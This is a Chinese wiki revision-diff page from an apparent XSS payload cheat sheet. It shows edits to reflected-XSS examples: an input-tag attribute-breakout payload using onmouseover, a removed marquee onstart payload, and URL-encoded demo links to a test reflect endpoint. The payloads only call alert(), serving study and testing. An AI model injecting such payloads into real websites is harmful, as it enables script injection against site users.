用户工具

站点工具


start:mining

差别

这里会显示出您选择的修订版和当前版本之间的差别。

到此差别页面的链接

两侧同时换到之前的修订记录 前一修订版
上一修订版 两侧同时换到之后的修订记录
start:mining [2017/06/04 08:56]
xss [javascript伪协议]
start:mining [2017/06/04 09:31]
xss
行 49: 行 49:
 ## input标签 ## input标签
  
 +之所以我这么写,有时候输入的payload是这样的"​ onmouseover=alert(location.href) bad="​,而input标签是本身的
 ``` ```
-<input type="​text" ​oninput=alert(location.href)>​+<input type="​text" ​value="​xss"​ onmouseover=alert(location.href) ​bad=""​>
 ``` ```
-[演示](http://​xss.wiki/​reflect.php?​xss=%3Cinput%20type%3D%22text%22%20oninput%3Dalert%28location.href%29%3E)+[演示](http://​xss.wiki/​reflect.php?​xss=%3Cinput%20type%3D%22text%22%20value%3D%22xss%22%20onmouseover%3Dalert%28location.href%29%20bad%3D%22%22%3E)
  
-## marquee标签 
- 
-``` 
-<marquee onstart="​alert(location.href)">​xss</​marquee>​ 
-``` 
-[演示](http://​xss.wiki/​reflect.php?​xss=%3Cmarquee%20onstart%3D%22alert%28location.href%29%22%3Exss%3C%2fmarquee%3E) 
  
 ## a标签 ## a标签
start/mining.txt · 最后更改: 2017/06/04 09:56 由 xss